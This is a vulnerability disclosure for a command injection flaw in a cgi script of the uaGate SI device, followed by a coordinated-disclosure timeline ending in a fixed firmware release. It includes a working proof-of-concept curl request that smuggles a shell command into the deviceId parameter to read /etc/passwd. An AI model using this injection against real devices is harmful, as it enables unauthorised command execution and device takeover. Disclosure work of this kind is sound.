A cgi script of the uaGate SI handles its parameters in an unsafe fashion. Maliciously carfted url parameters can transfere an arbitrary command payload that is executed with the rights of the webserver. The command output returned to stdout is returned by the Webserver in response to the malicious web request.
An authenticated attacker can execute arbitrary commands by issuing a web request.
proof of concept details
curl --silent --user itadmin:******* 'http://uagate/cgi-bin/it/registerAzureIotProxy.cgi?task=register&deviceId=%26cat%20/etc/passwd%26' | cat | head -n 30
This exploit can be used in an exploit chain together with a privilege escalation vulnerability to gain complete control over the target device.
- day 0 - pentest of uaGate SI Device - 21.12.2018
- day 28 - initial issue related contact to manufacturer - 18.01.2019
- day 63 - issue report to manufacturer - 22.02.2019
- day 66 - secure communication cannel established - 25.02.2019
- day 74 - detailed issue report to manufacturer - 05.03.2019
- day 116 - manufacurer ackloknowledged security issues - 16.04.2019
- day 125 - CVE ID issued by MITRE - 25.04.2019
- day 229 - fix found in Firmware 1.71.00.1225 - 07.08.2019
- day 293 - released - 10.10.2019